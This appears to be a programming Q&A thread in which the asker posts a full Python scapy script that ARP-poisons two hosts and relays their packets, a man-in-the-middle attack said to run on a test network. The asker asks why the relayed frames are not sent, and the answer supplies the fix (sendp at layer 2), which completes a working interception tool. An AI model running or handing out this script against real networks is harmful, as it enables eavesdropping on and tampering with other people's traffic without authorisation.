# Man in the middle attack with scapy

Tags: python, network-programming, exploit, scapy, man-in-the-middle

I'm trying to do a man in the middle attack with `scapy` on a test network. My setup is like this: 
[image]

Now that you get the idea, here's the code:

```
from scapy.all import *
import multiprocessing
import time
class MITM:
  packets=[]
  def __init__(self,victim=("192.168.116.143","00:0c:29:d1:aa:71" ),node2=("192.168.116.1", "00:50:56:c0:00:08")):
    self.victim=victim
    self.node2=node2
    multiprocessing.Process(target=self.arp_poison).start()
    try:
      sniff(filter='((dst %s) and (src %s)) or ( (dst %s) and (src %s))'%(self.node2[0], self.victim[0],self.victim[0],self.node2[0]),prn=lambda x:self.routep(x))
    except KeyboardInterrupt as e:
      wireshark(packets)
    #self.arp_poison()
  def routep(self,packet):
    if packet.haslayer(IP):
      packet.show()
      if packet[IP].dst==self.victim[0]:
        packet[Ether].src=packet[Ether].dst
        packet[Ether].dst=self.victim[1]
      elif packet[IP].dst==self.node2[0]:
        packet[Ether].src=packet[Ether].dst
        packet[Ether].dst=self.node2[1]
      self.packets.append(packet)
      packet.display()
      send(packet)
      print len(self.packets)
      if len(self.packets)==10:
        wireshark(self.packets)
  def arp_poison(self):
    a=ARP()
    a.psrc=self.victim[0]
    a.pdst=self.node2[0]
    b=ARP()
    b.psrc=self.node2[0]
    b.pdst=self.victim[0]
    cond=True
    while cond:
      send(b)
      send(a)
      time.sleep(5)
      #cond=False
if __name__=="__main__":
  mitm=MITM()
```

This code is running on the `VM2`.

Arp poisoning works fine, I check the arp caches of both the machines and the behavior is as I expected. But inside `routep`, I modify the src and dst mac address and try to send the received packet to appropriate host, scapy gives a warning:

```
WARNING: more Mac address to reach destination not found. Using broadcast
```

And I see in the `wireshark` on `VM2`, the modified packets are not leaving the machine. Why would that be the case? Am I missing something?

Comment: Could it be that you have to explicitly tell scapy that you want to send and receive frames including MAC layer?

Comment: I think you're over complicating it. You only need to send forged arp replies to the subnet and enable ip forwarding on your machine. http://www.secdev.org/projects/scapy/doc/usage.html#arp-cache-poisoning

Answer (score 1):

If you use scapy's `send()`, it works on the third layer. From scapy's documentation:

> The send() function will send packets at layer 3. That is to say it will handle routing and layer 2 for you. The sendp() function will work at layer 2.

If you were to use `sendp()`, it won't use the default values for the destination's Mac address and your warning'll be gone.